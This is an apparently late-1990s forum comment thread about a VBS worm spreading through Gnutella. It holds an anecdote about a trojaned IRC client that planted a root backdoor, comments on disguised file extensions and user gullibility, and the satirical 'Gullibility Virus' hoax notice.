Remember sirc2 or whatever, the quasi-irc client that allowed spoofed connections? This reminds me of what I did back in 1996 when I was doing my first unix administration (Slackware Linux).. I was a big IRC freak, and someone on IRC offered sirc2 source code, which was big news cause it was private. What they didnt document in their dcc offer is that it was trojaned to compile a trojanned login program, and replace your existing login with a backdoor so that you could login as "phat" or something and get in as root. And it'd conviently email the guy.. Since it did packet spoofing, it of course needed to be run as root. So file permissions were useless. Of course, I didnt run an untrusted executable, I compiled it! I didnt read the source though, till after I noticed that the sirc2 source directory nuked itself. This is cause there was a nice exec() of rm * when it was run before it emailed off. Once I noticed the directory was blank, I went through the source code. I of course, closed it up right when I read the source and found the exec, but 17 minutes later, someone from canada tried to login. This was a fantastic case of user education. Trojans can even affect Linux users who compile source code, even with tight file permissions. This is the closest I ever got to be rooted. I was sure paranoid after that point. I screen any script or source I get off of IRC now. --helixblue.

Humans weak. Grunt, grunt.

[ptbrown]

What really amuses me is the files that are named "*.mp3.htm". Which, of course, when viewed in WinExploder with the "dummy-me-is-afraid-of-extensions" mode, will hide the ".htm" causing some idiot somewhere to think it's an mp3 file even though it *Clearly Has The Icon* of an html file.

<RANT>
I mean, the mindless masses got all excited when they were presented with a GUI and no longer needed to use the command line, but then they don't utilise any of the features the GUI gives them. Look at the state of drag-and-drop in Windows, it works in MS apps and maybe a dozen others, but is nothing near universal -- Why? Because the lusers don't realise that d'n'd is there and don't use it and thus, developers don't have any incentive to implement it properly. So the next time you curse MS for having a bass-ackward interface, remember that it sucks because they're marketing towards people who don't know it sucks... Then curse MS for not taking the leadership role and failing to adequately introduce the new technologies to the users. (God forbid you actually have to learn something to use a computer.) This is why these VBS trojans are so effective in being spread; the mindless masses don't realise what a .vbs file is, Microsoft never having told them. If MS had educated the public more about VBS and WSH, more people would know what they do, and would be less prone to open them without thinking it might not be a good idea. So now MS is forced to cripple their product to "protect" the lusers from their own ignorance -- an ignorance that MS encourages.
</RANT>

Gullibility Virus

[jabber]

WARNING, CAUTION, DANGER, AND BEWARE!
Gullibility Virus Spreading over the Internet!

WASHINGTON, D.C.--The Institute for the Investigation of Irregular Internet Phenomena announced today that many Internet users are becoming infected by a new virus that causes them to believe without question every groundless story, legend, and dire warning that shows up in their inbox or on their browser. The Gullibility Virus, as it is called, apparently makes people believe and forward copies of silly hoaxes relating to cookie recipes, email viruses, taxes on modems, and get-rich-quick schemes.

"These are not just readers of tabloids or people who buy lottery tickets based on fortune cookie numbers," a spokesman said. "Most are otherwise normal people, who would laugh at the same stories if told to them by a stranger on a street corner." However, once these same people become infected with the Gullibility Virus, they believe anything they read on the Internet. "My immunity to tall tales and bizarre claims is all gone," reported one weeping victim. "I believe every warning message and sick child story my friends forward to me, even though most of the messages are anonymous."

Another victim, now in remission, added, "When I first heard about Good Times, I just accepted it without question. After all, there were dozens of other recipients on the mail header, so I thought the virus must be true." It was a long time, the victim said, before she could stand up at a Hoaxees Anonymous meeting and state, "My name is Jane, and I've been hoaxed." Now, however, she is spreading the word. "Challenge and check whatever you read," she says. Internet users are urged to examine themselves for symptoms of the virus, which include the following: The willingness to believe improbable stories without thinking. The urge to forward multiple copies of such stories to others. A lack of desire to take three minutes to check to see if a story is true.

T. C. is an example of someone recently infected. He told one reporter, "I read on the Net that the major ingredient in almost all shampoos makes your hair fall out, so I've stopped using shampoo." When told about the Gullibility Virus, T. C. said he would stop reading email, so that he would not become infected. Anyone with symptoms like these is urged to seek help immediately.

Experts recommend that at the first feelings of gullibility, Internet users rush to their favorite search engine and look up the item tempting them to thoughtless credence. Most hoaxes, legends, and tall tales have been widely discussed and exposed by the Internet community. Courses in critical thinking are also widely available, and there is online help from many sources, including

Department of Energy Computer Incident Advisory Capability at http://ciac.llnl.gov/ciac/CIACHoaxes.html

Symantec Anti Virus Research Center at
http://www.symantec.com/avcenter/index.html

McAfee Associates Virus Hoax List at
http://www.mcafee.com/support/hoax.html

Dr. Solomons Hoax Page at
http://www.drsolomons.com/vircen/hoax.html

The Urban Legends Web Site at
http://www.urbanlegends.com

Urban Legends Reference Pages at
http://www.snopes.com

Datafellows Hoax Warnings at
http://www.Europe.Datafellows.com/news/hoax.htm

Those people who are still symptom free can help inoculate themselves against the Gullibility Virus by reading some good material on evaluating sources, such as

Evaluating Internet Research Sources at
http://www.sccu.edu/faculty/R_Harris/evalu8it.ht m

Evaluation of Information Sources at
http://www.vuw.ac.nz/~agsmith/evaln/evaln.htm

Bibliography on Evaluating Internet Resources at
http://refserver.lib.vt.edu/libinst/critTHINK.HT M

Lastly, as a public service, Internet users can help stamp out the Gullibility Virus by sending copies of this message to anyone who forwards them a hoax. This message is so important, you should be sending it anonymously! Forward it to all your friends right away! Don't think about it! This is not a chain letter! This story is true! Don't check it out! This story is so timely, there is no date on it! This story is so important, we're using lots of exclamation points! Lots!! For every message you forward to some unsuspecting person, the Home for the Hopelessly Gullible will donate ten cents to itself. (If you wonder how we will know you are forwarding these messages all over creation, you're obviously thinking too much.)

Re:Conspiracy? No, just easier

[Rilke]

Part of the kick of virus writers seems to be the enjoyment of watching your own code destroy peoples machines. And that's just gotten tremendously simple since MS has opened up half the world's computers.

Think back to Robert Morris. Now that was a hack, and took signficant skill. Nowadays, every two-bit script kiddie can tear mail servers up after half a day of perusing a book on VBS.

Propagation is simple these days because everybody's got e-mail and the apps and OS they're using are tremendously easy to infect.

Yeah, that one trashed my drive pretty badly...

[devphil]

...and I understand that it was cross-platform, too. Spread to MacOS and Novell Netware within a few hours.

Nasty.

VBS Strikes Again!

[rifter]

Once again we see why scripting languages need to be secured, indeed all web technologies. But why was Gnutella scriptable with VBS?

Linux GNUtella implementations exist

[Stonehead]

Do a search on "GNUtella" on freshmeat and you'll find several projects. By the way, acceptance of a protocol lies by no means in its simplicity, but in its functionality, quality, security and speed.

Sounds like a good idea

[Buttercup]

Anything that spreads Vacation Bible School files is a good thing, in my book.

MJP